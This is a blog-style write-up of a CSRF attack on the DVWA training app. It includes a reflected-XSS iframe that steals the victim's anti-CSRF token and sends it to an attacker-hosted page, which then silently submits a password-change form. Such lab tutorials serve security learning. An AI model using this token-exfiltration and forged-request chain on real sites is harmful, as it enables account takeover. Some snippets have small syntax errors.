Powerful CRSF exploit with iFrames

I was training my hacking skills on the DVWA, for the attacks CRSF ( Cross Site Request Forgery ) and I wanted an elegant way to orchestrate my attack.

Brief Explanation of CRSF

To make it simple, a CRSF is an attack consisting in making the victim do a request without their consent. To get the idea, it could be a link redirecting to :

http://website_not_protected.com/change_password.php?new_password=hacked.

Without any protection from the website, a victim clicking on this link would change their password without noticing. But it is not that easy ( fortunately .. ), that change_password.php page require you to be logged. A way for an hacker to counter this would be to insert some code on the website to redirect you to the page without losing your session cookie ( what keeps you logged on the website ). In that perspective, the hacker needs another exploit to insert some code on the website.

The idea of the iFrames

The iFrames can be used in javascript to open another page, just like this :

<iframe type=hidden" id="iframe" 
src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" 
onload="window.open('//10.6.66.64/index.php"></iframe>

There are very powerful as an hacking tool, since they can be invisible for the user. Here, the iFrame opens a website we are hosting ( supposing our IP is 10.6.66.64 ). The idea will be to open such an iFrame by exploiting another breach, and calling our own page that will send a form to change the password of the user.

The attack

Usually, such an attack requires another weakness. One of the most common exploit that can be used for a CRSF is a XSS. We are going to test our attack on the security high of the DVWA. We need first to prepare our page. We need to send a form to http://10.6.66.42/dvwa/vulnerabilities/csrf/ that requires a user_token. Here is the page we are going to host :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Exploit</title>
    <meta name="referrer" content="no-referrer">
    <style type="text/css" media="screen"></style>
  </head>

  <body >
     <form method="GET" action="http://10.6.66.42/dvwa/vulnerabilities/csrf/" target="csrf-frame" id="csrf-form">
        <input type="hidden" name="password_new" value="password">

        <input type="hidden" name="password_conf" value="password">
        <input type="hidden" name="user_token" value="<?php echo $_REQUEST['user_moken'];?>">
        <input type="hidden" name="Change" value="Change">
  
   </form>
   <Script>document.getElementById("csrf-form").submit();</Script>


  </body>
</html>

The request will pass only if the value of user_token corresponds to the victim token. So the iFrame will need to grab that value, and give it to our page as paramater ( called moken here ). This value can be collected with the following javascript code on the password change page at http://10.6.66.42/dvwa/vulnerabilities/csrf/.

var moken = this.contentDocument.getElementsByName('user_token')[0].value

Putting all together, the idea is to create an iFrame that would request
http://10.6.66.42/dvwa/vulnerabilities/csrf/, collect the token, and send it to our hosted page within the same iFrame. We can exploit the XSS Reflected page to call our iFrame :

<iframe type=hidden" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" 
onload="
var moken = this.contentDocument.getElementsByName('user_token')[0].value;
window.open('//10.6.66.64/index.php?user_moken='+moken)
"></iframe>

Leave a Reply

Your email address will not be published. Required fields are marked *